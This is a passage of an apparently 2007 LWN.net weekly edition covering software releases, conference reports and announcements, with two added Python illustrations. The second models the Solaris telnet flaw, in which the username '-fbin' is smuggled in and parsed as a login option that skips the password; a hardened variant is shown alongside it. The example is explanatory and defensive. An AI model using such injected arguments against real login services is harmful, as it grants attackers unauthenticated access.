Visprint makes cool fractal fingerprint png images based on the contents of any file. The image will be different for almost every file with even slightly different contents. Visprint uses the IFS fractal generation process, pioneered by Michael Barnsley. It is a way to create images which are self-similar to infinite depths. In other words, the picture is made up of smaller versions of itself."
Comments (none posted)
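The idea behind a fractal fingerprint, as an added example that is not Visprint's own code: derive the parameters of an iterated function system from the file's contents, run the chaos game, and rasterize the orbit. Visprint's actual byte-to-parameter mapping is not described on the page; this model hashes the contents with SHA-256 first and builds four affine maps from the digest, so any change to the input changes every map. It emits a text raster rather than a PNG so that it runs with the standard library alone.

```python
import hashlib
import random


def ifs_maps(digest, n_maps=4):
    """Turn digest bytes into n affine maps (a, b, c, d, e, f).

    Assumption for this model: the four linear coefficients are scaled
    into [-0.45, 0.45], so every row of the 2x2 part sums to less than
    0.9 in absolute value. Each map is then a contraction in the max
    norm and the chaos game cannot run off to infinity.
    """
    maps = []
    for i in range(n_maps):
        chunk = digest[6 * i:6 * i + 6]
        a, b, c, d = [(v / 255.0 - 0.5) * 0.9 for v in chunk[:4]]
        e, f = [v / 255.0 for v in chunk[4:]]   # translations in [0, 1]
        maps.append((a, b, c, d, e, f))
    return maps


def chaos_game(maps, seed, iterations=20000, burn_in=20):
    """Iterate a randomly chosen map from the current point; the points
    after the burn-in approximate the IFS attractor (the self-similar
    picture). The map sequence is seeded from the digest too, so the
    result is fully determined by the input bytes."""
    rng = random.Random(seed)
    x = y = 0.0
    points = []
    for i in range(iterations):
        a, b, c, d, e, f = rng.choice(maps)
        x, y = a * x + b * y + e, c * x + d * y + f
        if i >= burn_in:
            points.append((x, y))
    return points


def rasterize(points, rows=16, cols=32):
    """Scale the orbit into a rows x cols grid and mark occupied cells."""
    xs = [p[0] for p in points]
    ys = [p[1] for p in points]
    x0, y0 = min(xs), min(ys)
    w = max(max(xs) - x0, 1e-9)   # guard against a degenerate attractor
    h = max(max(ys) - y0, 1e-9)
    grid = [[0] * cols for _ in range(rows)]
    for x, y in points:
        col = min(int((x - x0) / w * cols), cols - 1)
        row = min(int((y - y0) / h * rows), rows - 1)
        grid[row][col] = 1
    return tuple("".join("#" if v else "." for v in r) for r in grid)


def fingerprint(data, rows=16, cols=32):
    """Text fingerprint of a byte string: hash, build the IFS, plot it."""
    digest = hashlib.sha256(data).digest()
    return rasterize(chaos_game(ifs_maps(digest), digest), rows, cols)


if __name__ == "__main__":
    # constructed sample inputs differing in a single byte
    for sample in (b"The quick brown fox", b"The quick brown fix"):
        print(sample.decode())
        print("\n".join(fingerprint(sample)))
        print()
```

Because the whole picture is a function of the digest, two inputs that differ in one byte yield unrelated attractors, which is the property the Visprint description relies on. The flip side is the same as for any hash: the image identifies a file but says nothing about its origin, so it is a recognition aid, not a signature.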
Languages and Tools
C
Version 4.1.2 RC2 of the GNU Compiler Collection (GCC) is available.
"
The changes relative to RC1 are fixes for:
1. PR 29683: a wrong-code issue on Darwin
2. PR 30370: a build problem for certain PowerPC configurations
3. PR 29487: a build problem for HP-UX 10.10 a code-quality problem for
C++ on all platforms". GCC 4.1.2 should be released within a week.
Full Story (comments: none)
Caml
The February 13, 2007 edition of the Caml Weekly News
is out with new Caml language articles.
Full Story (comments: none)
PHP
Version 5.2.1 of
PHP has been released.
"
The PHP development team would like to announce the immediate availability of PHP 5.2.1. This release is a major stability and security enhancement of the 5.X branch, and all users are strongly encouraged to upgrade to it as soon as possible."
Comments (none posted)
Tcl/Tk
The February 7, 2007 edition of the Tcl-URL! is online with new
Tcl/Tk articles and resources.
Full Story (comments: none)
Cross Compilers
A new port of the GNU 68HC11/12 cross-compiler
has been announced.
"
I have ported the kernel MCX11 to MCX12 in order to use it with the MC9S12 microcontrollers family."
Comments (none posted)
Editors
Version 0.5.1 of
peppy,
the "Proximated Emacs Powered by Python",
has been announced. Peppy is:
"
An experiment using the modern software development process -- this is a wxPython/Scintilla-based editor written in and extensible through Python. It attempts to provide an XEmacs-like multi-window, multi-tabbed interface using the Advanced User Interface (wx.aui) framework of wxPython."
Comments (none posted)
Libraries
Version 3.9.3 of FreeImage, an open-source library which supports the
PNG, BMP, JPEG, TIFF image formats,
is available.
"
This maintenance release improves the speed of the GIF encoder, adds a new JPEG downsampling feature (useful to generate thumbnails) and also provides a better MacOSX makefile."
Comments (none posted)
Page editor: Forrest Cook
Linux in the news
Recommended Reading
Samba developer Jeremy Allison
writes about
software development topics. "
Most software development is a local
activity, done directly for the benefit of the people writing it. The
wonderfully bureaucratic sounding "Directorate General for Enterprise and
Industry" of the European Union recently commissioned an extensive study on
what they call FLOSS (Free/Libre/Open Source Software)."
Comments (2 posted)
Anybody who runs Solaris systems should have a look at
this Technology Review article by Simson Garfinkel on the recently-disclosed telnet vulnerability. "
What Maynor discovered is that an attacker can try to log in with a user name like '-fbin.' The '-fbin' is passed along to the log-in program, which misinterprets the "-f" as a command from the operating system to log the user in to the specified account without asking for a password." For added fun, consider that Solaris 10 enables telnet by default, and that the vulnerability
is not particularly new.
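The mechanism Garfinkel describes is a classic argument injection: a value the client controls is placed on another program's command line, and that program's option parser reads it as a flag. The following is an added illustration, not code from the article, from Sun or from any telnet implementation: a small Python model of a wrapper that hands a client-supplied username to a getopt-style login program. The option string, the meaning of `-f`, the username rule and the host address are assumptions made for the model and do not describe Solaris's real argument handling.

```python
import getopt
import re

# Assumed option string for the login-style program being modelled:
# -p and -h/-d behave as flags with or without values, and "f:" means
# -f takes an account name and is trusted to skip the password prompt.
LOGIN_OPTS = "pf:h:d:"


def parse_login(argv):
    """Model of how a getopt-based login program sees its argv.

    Returns (account, password_required). getopt stops at the first
    non-option argument or at "--"; anything before that which starts
    with "-" is treated as an option, whatever the caller meant by it.
    """
    opts, positional = getopt.getopt(argv, LOGIN_OPTS)
    opts = dict(opts)
    if "-f" in opts:
        # -f: the caller vouches for the user, so no password is asked
        return opts["-f"], False
    account = positional[0] if positional else None
    return account, True


def vulnerable_argv(remote_host, user):
    """Wrapper that copies the client-supplied USER value straight
    onto login's command line as a trailing argument."""
    return ["-p", "-h", remote_host, user]


# Assumed local username policy: must start with a letter or underscore,
# so a value beginning with "-" can never reach the command line.
USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")


def is_valid_username(user):
    return USERNAME_RE.match(user) is not None


def hardened_argv(remote_host, user):
    """Same wrapper with two independent defences: reject anything that
    is not a plausible username, and terminate option parsing with "--"
    so that even a value that slips through stays positional."""
    if not is_valid_username(user):
        raise ValueError("refusing to pass %r as a username" % (user,))
    return ["-p", "-h", remote_host, "--", user]


if __name__ == "__main__":
    host = "192.0.2.10"  # constructed example address
    print("vulnerable:", parse_login(vulnerable_argv(host, "-fbin")))
    print("hardened:  ", parse_login(hardened_argv(host, "bin")))
    print("-- alone:  ", parse_login(["-p", "-h", host, "--", "-fbin"]))
```

Run stand-alone, the vulnerable path reports that "-fbin" logs the session in as `bin` with no password required, while the hardened path either refuses the value or, thanks to the `--` separator, delivers it to login as a literal (and nonexistent) username that still has to authenticate. Both defences matter on their own: the validation stops the obvious case, and `--` is what keeps a future parser change or a missed edge case from turning data back into an option.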
Comments (18 posted)
Linux.com
looks at two
decisions by the Ubuntu Technical Board. "
Ubuntu CTO Matt
Zimmerman has announced two Ubuntu Technical Board decisions that will
affect the upcoming Feisty Fawn release, due out in April of this year. For
the Feisty release, proprietary video drivers are out of the default
install, and the PowerPC port of Ubuntu is being downgraded to an
unofficial release."
Comments (36 posted)
Trade Shows and Conferences
Linux-Watch
covers
the recent Linux Wireless Summit.
"
Once there, according to Stephen Hemminger, Linux Wireless Summit co-coordinator and a Linux software developer at the Linux Foundation, the attendees had a very productive meeting. Still, it's been slow going in some critical areas of Linux and WiFi, according to John Linville, the Linux wireless software maintainer. In particular, Linville reported that development work is proceeding too slowly on a new 802.11 stack (d80211); and with a new WiFi API (cfg80211), "development is even slower.""
Comments (none posted)
Linux-Watch
looks forward
to LinuxWorld OpenSolutions Summit, which opens this week in New York
City. "
During the conference, attendees will network with their
business-oriented Linux peers and learn from their experiences -- mistakes
and successes -- through case studies. The conference will also feature
in-depth technical presentations by leading Linux and open source
experts."
Comments (none posted)
LXer has a
look at
SCALE 5X day one. "
I have to tell you this is one big event,
with over 70 booths and thousands of attendees this is by far the biggest
SCaLE event ever. I will be posting pictures I have taken in the next few
days. I have just been trying to take it all in. I met a man that has only
been using Linux off of a live-CD that was given to him a couple of months
ago. I asked him why wanted to switch to Linux and why he came to SCaLE. He
told me that he is tired of Windows crashing and taking all of his music
with it and he is attending SCaLE to get some help in installing Linux on
his machine for good. He came to the right place."
Comments (none posted)
Linux.com
covers the
fifth annual Southern California Linux Expo. "
Most IT conferences,
it seems, start with a keynote around 9 a.m., which means that attendees
have to be queued up for registration by 8 a.m., which is a little earlier
than is reasonable for people who've just arrived the night before on a
redeye flight. SCALE's registration started at 9 a.m. on Saturday, with
talks starting at 10 a.m., and the exhibit floor opening at the same
time. SCALE's publicity chair, Orv Beach, says that the organizers decided
to avoid keynotes because they wanted the sessions to be all about
education, and that SCALE organizers didn't think that keynotes met that
standard -- though they may re-evaluate that for future SCALE
events."
Comments (none posted)
The Jem Report has a
review of
the Women in Open Source mini-conference at the Southern California Linux
Exposition (SCALE 5X). "
The subject of women in free/open source
software is one that had not been previously explored in SCALE or other,
similar conferences to date. Viewing its debut was, to say the least, an
extraordinarily interesting experience. Most of the speakers were
experienced in giving presentations of this kind, but had previously been
the only or one of few female speakers at other free software
conventions."
Comments (none posted)
Companies
Linux-Watch
looks at JBoss
founder Marc Fleury. "
Marc Fleury, founder of JBoss and often
controversial open source leader, has left Red Hat. The move came as no
surprise to many in the industry. In a statement, Fleury wrote, "I have
done what I can to help Red Hat succeed. People need to understand that
Open Source is a tsunami that is transforming the software industry in its
wake and its inevitability is now well beyond challenge or the force of
individual personality.""
Comments (none posted)
ZDNet
reports
that Sun will probably use GPLv3 for Java and Solaris once that license
becomes available. "
The question is which open-source license should
govern the building of projects out of the company's technology crown
jewels. The open-source Solaris project began with a Community Development
and Distribution License (CDDL), and open-source Java employs version 2 of
the General Public License (GPL). Now, though, Sun likes the idea of
governing both projects with the upcoming GPL version 3, Chief Executive
Jonathan Schwartz said in a speech and an interview at the company's
analyst summit here Tuesday."
Comments (1 posted)
Linux at Work
heise online
covers
the launch of the CHiC cluster system.
"
On February 7, the CHiC massive parallel Linux cluster with 2,152 processors distributed across 538 server nodes went into operation in Chemnitz. The new Revision F generation of AMD's Opteron CPUs, which support DDR2 RAM and AMD's "Secure Virtual Machine" (SVM) virtualization technology, are used. Infiniband is used to connect the nodes, which are equipped with IBM server boards."
Comments (none posted)
Interviews
Linux.com
takes a
look at Sulamita Garcia and LinuxChix Brazil. "
A lot of people
have bemoaned the lack of women participating in open source communities,
but Sulamita Garcia is one of the few who have stepped up to do something
about it. A Slackware user from Florianopolis, Brazil, Garcia has been
heading up LinuxChix Brazil for four years."
Comments (11 posted)
Don Marti
interviews Jeremy Allison of the Samba project.
"
LinuxWorld: Now the reason that you left Novell has to do with Microsoft and Novell setting up a deal to in effect pay Microsoft a patent royalty on copies of Linux sold.
Allison: That's right. I mean essentially, it's a patent cross license. They don't call it that. They call it a covenant not to sue with customers. But when you boil it down, and you look at it really closely, it is a patent cross license. And section seven of the GPL specifically states that you can't cut yourself a special patent cross license deal. Essentially it's one of those situations where everyone has to hang together not separately, as it were. So, in other words, you can't cut yourself special deals. And as I said, I wanted to like the deal. I had no objections."
Comments (14 posted)
Resources
Matthew Gast
discusses
the addition of timezone processing capabilities to the Asterisk PBX
system in part one of a Linux Journal series.
"
I returned to my idea once I started using Asterisk, because it provides an extensive toolkit for designing PBX-hosted services. Anything that can be coded in a computer can become an Asterisk service. After I understood the basics of Asterisk, I sat down to implement a feature that kept track of the time of day where I visited and prevented calls from coming in at inconvenient times."
Comments (1 posted)
Reviews
Techworld
looks at the Open Linux Router project.
"
The project, called the Open Linux Router, joins some other efforts at bringing open source into the world of routers, notably the Extensible Open Router Platform (XORP) sponsored by Vyatta, but aims to add features such as a file-sharing server and a firewall.
It is the brainchild of four Michigan university students, who acknowledged Vyatta as an inspiration but saw the need for a more expandable, easier-to-use system. The system, like XORP, is intended to run on off-the-shelf hardware, with enough modularity to allow it to run on anything from an embedded device to an enterprise server."
Comments (none posted)
Linux.com
reviews a
game called Frets on Fire. "
You suck on electric guitar. If you are
not aware of that now, you will be after playing Frets on Fire -- a
cross-platform, GPLed music game from Unreal Voodoo, where your PC's
keyboard is the instrument and you play lead. Game play is similar to the
commercial GuitarFreaks and Guitar Hero series. With the backing track to a
song playing, notes scroll towards you in real time on a simplified guitar
fretboard. When they reach the front, you fret the notes in question by
holding down the corresponding keys with your fret hand, and you "pick" the
notes by hitting the Enter key."
Comments (none posted)
KDE.News
looks at the
Decibel chat and phone communication
service architecture that will be part of KDE 4.
"
The goal of Decibel is to create a bridge between different communication technologies. Decibel will make it easy to integrate real-time communication technologies into applications, Tobias says. Decibel provides a central storage place for settings of real-time communications. This will allow one communication application (say, email) to talk to another communication application (say, instant messaging) without having to learn a new language."
Comments (none posted)
O'ReillyNet
looks
at cluster management with openQRM. "
openQRM, which just reached
version 3.1, is an open source cluster resource management platform for
physical and virtual data centers. In a previous life it was a proprietary
project. Now it's open source and is succeeding in integrating different
leading open source projects into one console. With a pluggable
architecture, there is more to come. I've called it "cluster resource
management," but it's really a platform to manage your
infrastructure."
Comments (3 posted)
Rui Lopes
reviews
Linux security tools on Linux.com.
"
System-wide security solutions such as SELinux, AppArmor, Bastille and grsecurity can, in most cases, make your Linux desktop more than reasonably secure. But there are still cases where file or directory encryption is necessary. Here are some tools that can help you when you need to move files outside of your home computer, carry personal data around with you on a pendrive, or send email messages containing sensitive information."
Comments (none posted)
Linux.com
looks at
Sonnet, which will be included in KDE 4.
"
With the Sonnet library for KDE 4, developer Jacob Rideout hopes to reinvigorate the field of desktop linguistics by adding automatic language detection and other innovative features. Sonnet is to be for KDE 4 what KSpell 2 is for the current version of the K Desktop Environment, providing spellchecking facilities to applications as diverse as the Konqueror Web browser, Kopete instant messenger, and KWord office software. Unlike KSpell, however, it will also provide grammar checking, multilingual tools, and perhaps even translation, dictionary, and thesaurus functionality across all of KDE."
Comments (none posted)
Linux-Watch
looks at the
release of paravirtualized network and block device drivers that allow
Windows Server to run unmodified in Xen virtual environments. "
These
device drivers support SUSE Linux Enterprise Server 10 (SLES), and work on
Intel-based server platforms featuring chipsets using Intel-VT
(Virtualization Technology). The new drivers will let customers migrate to
newer and fewer energy-efficient servers, consolidating legacy Windows or
Linux solutions onto virtual servers."
Comments (7 posted)
Miscellaneous
Dave Phillips
covers
a selection of recent news in the Libre audio world. "
It's a mixed
bag this week from Studio Dave. I'll skip the preliminaries and just invite
you to dive in and check out some of the latest news from the
ever-expanding world of Linux sound and music software. There's far more
going on than I can possibly cover in my allotted space, but here's a quick
survey of some recent remarkable activity."
Comments (none posted)
Here's
an
InfoWorld column on the driver troubles being experienced by Windows
Vista users. "
Given how many other companies are similarly
under-delivering on hardware drivers for Vista, it's enough to make you
wonder why more vendors don't do more to support Linux. If writing drivers
for Vista is really this much of a chore, getting open source drivers for
Linux will seem trivial by comparison."
Comments (20 posted)
Here's
a posting by Michael Geist on the International Intellectual Property Alliance's list of countries which, it feels, do not live up to proper IP protection standards. "
These are just fourteen examples - there are dozens more countries on the list, including many developing countries, each invariably criticized for not adopting the DMCA, not extending the term of copyright, not throwing enough people in jail, or creating too many exceptions to support education and other societal goals. In fact, the majority of the world's population finds itself on the list, with 23 of the world's 30 most populous countries targeted for criticism (the exceptions are Germany, Ethiopia, Iran, France, the UK, Congo, and Myanmar)."
Comments (22 posted)
Page editor: Forrest Cook
Announcements
Non-Commercial announcements
The Electronic Frontier Foundation has announced an effort to support free
speech by citizen journalists. "The Electronic Frontier Foundation (EFF)
told a judge Wednesday to remove the legal muzzle on citizen journalists
caught up in a court battle over documents relating to the controversial
prescription drug Zyprexa. EFF argues that the injunction against
publication of the documents online is prior restraint on their free
speech and a violation of First Amendment rights. EFF's client posted
links on a "wiki" to electronic copies of damaging internal Eli Lilly
documents about Zyprexa."
Full Story (comments: none)
The February 13, 2007 edition of the FSFE Newsletter is online
with the latest Free Software Foundation Europe news. Topics include:
FSFE becomes the legal guardian of the OpenSwarm Project,
Transcript of Richard Stallman on the Free Software movement,
Windows Vista released - FSFE recommends switching to GNU/Linux and
Get Active: Join the Revolution!
Full Story (comments: none)
A committee within the OpenSolaris community has been having a long
discussion on whether Sun should dual-license the Solaris code, allowing
it to be distributed under the terms of either the CDDL or version 3 of
the GPL. That committee has now posted its recommendations: no move to
GPLv3 anytime in the near future. "GPL* licensing OpenSolaris would be
yielding to a small vocal minority of FOSS developers who use the lack of
GPL licensing, purely as a means of fostering FUD towards OpenSolaris and
who will, in all likelihood, find some other workable mechanism to
continue to foster FUD towards the project."
Comments (70 posted)
The OpenMoko team has sent out an update on the status of its completely
open GSM phone. It seems there have been a number of setbacks which are
delaying the project, but they are still pushing forward. The phone's
software will be opened up on schedule, despite its rougher than desired
condition. General availability of the phone now appears to be September.
Full Story (comments: 11)
The Open Solutions Alliance has announced its existence. "Initially, the
OSA will focus its efforts on defining and promoting tools, frameworks and
best practices that facilitate easy deployment and interoperability
between applications. It will also build 'meta-communities' by partnering
on projects that involve a variety of companies, communities and
individuals to drive innovation and collaboration. Finally, the OSA will
coordinate joint marketing campaigns to raise the awareness of
business-hardened, open source applications and solution suites."
Comments (none posted)
The OpenSSL cryptographic module is now certified for use by the US
government. "The Open Source Software Institute (OSSI) announced today the
FIPS 140-2 validation of the OpenSSL FIPS Object Module, a cryptographic
library based on the widely used OpenSSL product. The official validation
certificate (#733) is now posted at the NIST FIPS 140-1 and 140-2
Cryptographic Modules Validation List."
Full Story (comments: none)
Commercial announcements
ACCESS CO., LTD. has made several announcements at the 3GSM World Congress
where the company is demonstrating its Linux platform running on Texas
Instruments' OMAP platform and on Marvell's consumer electronic devices
including feature handsets, smartphones, GPS navigation systems, and
wireless handhelds. The company has also announced a Product Development
Kit and a pre-release version of its Software Development Suite and a
Global Partner Program to expand the mobile Linux market.
Comments (none posted)
Here is a press release from BitWay Computadores, EnabledPeople, and
IMTECH Brazil proclaiming the deployment of 50,000 Linux desktops under
the Brazilian government's "Computers For All" program. Another 10,000
systems are yet to be deployed. The companies appear to have developed
their own distribution: "Linux XP Desktop is a user-friendly desktop
operating system for home and office users. With a preinstalled version,
a user gets an applications set including OpenOffice package (supports
.DOC, .XLS, .PPT formats), corporate class Evolution e-mail client,
Firefox web browser, multi-protocol GAIM instant messenger and other
software. Linux XP Desktop is RedHat-compatible OS and therefore has a
maximum of other software available." (Thanks to Gary Smith).
Comments (16 posted)
SpikeSource has announced a partnership agreement. "Under this agreement,
SpikeSource will certify its applications and stacks on Ubuntu, and will
eventually deliver the entire SpikeSource application suite on Ubuntu.
Users of Ubuntu will benefit from SpikeSource certified applications and
integration as part of a wider Open Source IT infrastructure."
Comments (none posted)
OpenLogic, Inc. has sent out a press release concerning a survey they
conducted on the use of open-source software in business. "Key findings:
58% of all respondents have an open source policy, are currently
developing one or have a plan to create one. 83% of organizations using
more than 25 projects have an open source policy, are currently developing
one or have a plan to create one."
Comments (none posted)
Novell and Microsoft have unveiled more details about their joint
technical roadmap and the benefits customers can expect from the
collaboration. ""With this first installment of the Microsoft-Novell
development roadmap, we see that both companies are building on this
relationship to develop real, product-specific solutions to deliver on the
promises made to customers," said Al Gillen, research vice president,
System Software, for IDC. "The great potential of the November
announcement between Microsoft and Novell could have been disappointing
without a product-specific roadmap to execute against. With the roadmap,
the technology benefits customers can expect will be tangible and
delivered on a predictable basis.""
Comments (none posted)
Novell and Intel Corporation have announced the availability of
paravirtualized network and block device drivers that will allow Microsoft*
Windows* Server 2000/2003/XP to run unmodified in Xen* virtual environments
on SUSE Linux Enterprise Server 10 from Novell.
Full Story (comments: none)
OpenMoko, the company working toward the creation of a completely-open GSM
phone, has announced the opening of a number of resources, including its
source code repositories and bug tracker, a public wiki, and more. All can
be reached from the openmoko.org pages.
Full Story (comments: 7)
Oracle Corporation has announced a Linux version of its Oracle(R)
Communications Billing and Revenue Management enterprise revenue
management application. "The announcement furthers Oracle's commitment to
deliver world-class application functionality on Linux."
Comments (none posted)
rPath has announced the availability of rBuilder 3.0 and the rPath
Appliance Platform. "
rPath now provides software vendors complete
appliance lifecycle management -- from creation to deployment to
configuration to maintenance. Together, rBuilder and the rPath Appliance
Platform give software vendors a solution that simplifies software and
drives revenue growth."
Full Story (comments: none)
Userful Corporation has announced the open-source release of its PreBook
PC reservation and usage management system. "PreBook allows libraries,
Internet cafes, and universities to manage and track usage on both Windows
and Linux client PCs, efficiently controlling time and usage on their
computers. Customers use PreBook to manage all their computers through a
single web-based interface, saving hundreds of hours and thousands of
dollars over competing products."
Full Story (comments: none)
Visual Integrity has released FLY Batch 6.5, a developer component for
automating volume PDF and PostScript file conversion into web, print and
archive formats. "The company also cut prices up to 50% on all Linux
versions of software to match Microsoft Windows version pricing. FLY
Batch converts any PDF, PostScript or EPS file into a variety of formats
needed for print and web publishing, to meet compliancy requirements and
for archival projects. Scalable vector output formats include WMF, EMF,
SVG, DXF, CGM, HPGL, EPS, and MIF. High-fidelity TIFF, GIF, PNG, JPEG and
BMP image formats are supported and plain formatted ASCII can be
extracted."
Full Story (comments: none)
Vocalscape Networks, Inc. has announced their participation in the Ekiga
softphone project. ""Joining the open source community working on the
Ekiga softphone allows Vocalscape to share our experience with VoIP
technology and provides our customers and end-users with added
functionality more quickly," said Ron McIntyre, President of Vocalscape.
"Soon, in addition to our Eyefon softphone for Windows, end-users running
Linux operating systems will be able to make calls on the Vocalscape
network. Additionally, the Ekiga softphone will give users some added
functionality such as video calling and text messaging.""
Comments (none posted)
Xandros has sent out a press release for its "BridgeWays" product: "...a
new suite of next generation, cross-platform and cross-service,
workflow-driven and rules-based, management products and integration
frameworks." The buzzword storm does not relent anywhere through the
release - it is a masterpiece of the art. But we have not really been able
to figure out what the product does...
Full Story (comments: 5)
New Books
SitePoint has published the book Build Your Own Ruby on Rails Web
Applications by Patrick Lenz.
Full Story (comments: none)
Pragmatic Programmers has published the book
Rails for Java Developers by Stuart Halloway and Justin Gehtland.
Full Story (comments: none)
Education and Certification
The Linux Professional Institute will offer discounted certification exams
to attendees of the FOSDEM 2007 conference in Brussels, Belgium on
February 24 and 25. "Exams will be in the English language and include all
LPIC-1 (101 and 102), LPIC-2 (201 and 202), LPIC-3 (301, 302) and MySQL
certification exams. This will be the first time in the world that paper
versions of LPI's new LPIC-3 exams will be offered."
Full Story (comments: none)
Calls for Presentations
A Call For Papers has gone out for GUADEC 2007. "The GNOME Users and
Developers European Conference (GUADEC) invite you to participate in the
8th annual conference on the 15-21st July 2007 in Birmingham, England.
The deadline for proposals is Monday 12th March."
Comments (none posted)
A call for papers has gone out for IT-Incident Management and IT-Forensics
2007. The event will take place in Stuttgart, Germany on September 11-12,
2007.
Full Story (comments: none)
A Call for Papers has gone out for PAKCON III. The event will take place
in Karachi, Pakistan on May 26, 2007; submissions are due by April 5.
Full Story (comments: none)
Upcoming Events
KDE.News has announced a Call for Sponsorship for Akademy 2007. "aKademy
is the KDE World Summit, this year taking place in Glasgow at the end of
June. Sponsorship is an opportunity to promote your company or product to
the developers, users, deployers and consultants who will attend the
conference. It will also provide a marketing avenue for your company to
the thousands who read our website and publications. Most importantly, it
gives vital support which ensures that hundreds of KDE contributors can
meet together to plan the future of the free desktop."
Comments (none posted)
The Libre Graphics Meeting 2007 will take place in Montreal, Quebec,
Canada on May 6, 2007. "This year's LGM provides a venue where FLOSS
graphics application developers, users and professional artists from all
over the world meet to discuss collaboration, outline the future of the
projects together, with the goal of increasing interaction between
developers, professional graphics artists and print professionals to
improve the steadily expanding FLOSS graphics' application ecosystem."
Full Story (comments: none)
The Linux Users' Group of Davis has announced the next
Linux Installfest workshop. The event takes place in Davis, California
on February 18, 2007.
Full Story (comments: none)
The Network and Distributed Systems Security conference will take place
from February 28 to March 2, 2007 in San Diego, CA. "NDSS is a traditional
scholarly academic security conference with a peer reviewed track of
papers. However, this year we have made a special effort to make NDSS more
relevant to security practitioners by adding an invited talks track
focused on security threats by some leading practitioners."
Full Story (comments: none)
A Call for Participation has gone out for RailsConf Europe 2007. "To meet
the increasing demand for skill building, and to spread the joy of Rails,
Ruby Central and O'Reilly Media are teaming up to produce RailsConf Europe
2007, an entire conference dedicated to Ruby on Rails. Happening September
17-19 in Berlin, Germany, RailsConf Europe will offer keynotes, sessions,
and tutorials from the most innovative and successful Rails experts and
organizations."
Full Story (comments: none)
Events: February 22, 2007 to April 23, 2007
The following event listing is taken from the LWN.net Calendar.
| Date(s) | Event | Location |
|---|---|---|
| February 19 - February 23 | DebianEDU DevCamp | Soissons, France |
| February 22 | PyCon Tutorial Day | Addison, Texas |
| February 22 | CELF Japan Linux Technical Jamboree #13 | Tokyo, Japan |
| February 22 - February 24 | OpenMind 2007 | San Giorgio a Cremano, Naples, Italy |
| February 23 - February 25 | PyCon 2007 | Addison, Texas |
| February 23 | PHP Conference UK 2007 | London, England |
| February 24 - February 25 | Free and Open Source Software Developers' European Meeting | Brussels, Belgium |
| February 24 - February 25 | Java/DevJam/2007/Fosdem | Brussels, Belgium |
| February 26 - March 1 | PyCon Sprints | Addison, Texas |
| February 26 - March 2 | PHP5 Bootcamp Training at the Big Nerd Ranch | Atlanta, Georgia, USA |
| February 27 - March 1 | O'Reilly Emerging Telephony Conference | San Francisco, CA |
| February 27 - March 2 | EUSecWest Applied Security Conference | London, UK |
| February 28 - March 2 | Network and Distributed System Security Symposium | San Diego, CA, USA |
| March 2 - March 3 | LinuxForum 2007 | Copenhagen, Denmark |
| March 3 - March 8 | O'Reilly Emerging Technology Conference | San Diego, CA, USA |
| March 5 - March 8 | EclipseCon 2007 | Santa Clara, CA, USA |
| March 5 - March 6 | Karlsruhe Workshop on Software Radios | Karlsruhe, Germany |
| March 8 - March 10 | 2007 Open Source Think Tank | Napa, CA, USA |
| March 10 - March 13 | Camp 5 Advanced Zope3 Training | Charlotte, North Carolina, USA |
| March 12 - March 16 | QCon | London, England |
| March 12 - March 16 | Third Annual Security Enhanced Linux Symposium | Baltimore, US |
| March 12 - March 14 | BOSSA Conference | Porto de Galinhas, Brazil |
| March 13 - March 14 | The Linux Foundation Japan Symposium | Tokyo, Japan |
| March 14 - March 16 | PHP Quebec Conference | Montreal, Canada |
| March 14 - March 17 | Barbeque Sprint for Plone3 | Charlotte, North Carolina, USA |
| March 15 - March 21 | CeBIT computer fair | Hannover, Germany |
| March 16 - March 17 | MountainWest RubyConf | Salt Lake City, USA |
| March 18 - March 23 | Novell BrainShare 2007 | Salt Lake City, Utah, USA |
| March 19 - March 21 | UKUUG LISA/Spring Conference 2007 | Manchester, UK |
| March 22 - March 25 | Linux Audio Conference | Berlin, Germany |
| March 23 - March 25 | ShmooCon | Washington DC, USA |
| March 23 - March 25 | Guademy | Coruña, Spain |
| March 24 | FSF Associate Membership Meeting | Cambridge, MA, USA |
| March 26 - March 29 | Emerging Technology Conference | San Diego, CA, USA |
| April 1 - April 4 | International Lisp Conference 2007 | Cambridge, England |
| April 1 - April 5 | Embedded Systems Conference | San Jose, CA, USA |
| April 1 | GPLv3: Improving a Great Licence (discussion draft 3) | Brussels, Belgium |
| April 2 - April 6 | DJango Bootcamp | Atlanta, Georgia, USA |
| April 2 - April 5 | Hack in The Box Security Conference 2007 | Dubai, United Arab Emirates |
| April 3 - April 8 | Make Art 2007 | Poitiers, France |
| April 12 - April 14 | International Free Software Forum (Forum Internacional Software Livre) | Porto Alegre, Brazil |
| April 14 - April 15 | Ruby and Python Conference 2007 | Poznan, Poland |
| April 15 - April 18 | Gelato ICE: Itanium® Conference & Expo | San Jose, California, USA |
| April 17 - April 19 | Embedded Linux Conference | San Jose, USA |
| April 18 - April 20 | CanSecWest Applied Security Conference 2007 | Vancouver, Canada |
| April 19 | Linux 2007 | Lisbon, Portugal |
| April 19 | Power Architecture Software Summit | Austin, TX, USA |
| April 20 - April 22 | International Conference on Availability, Reliability and Security | Vienna, Austria |
| April 20 - April 22 | Penguicon 5.0 Open Source Software & Science Fiction Convention | Troy, Michigan, USA |
| April 21 | Romanian Open Source Development Meeting | Bucharest, Romania |
If your event does not appear here, please tell us about it.
Audio and Video programs
O'Reilly presents a podcast from the Web 2.0 Summit. "Web 2.0 Summit
program chair John Battelle moderated a public policy discussion with Art
Brodsky, the communications director of Public Knowledge, Ebay's Tod Cohen
and Amazon.com's Paul Misener."
Comments (none posted)
Page editor: Forrest Cook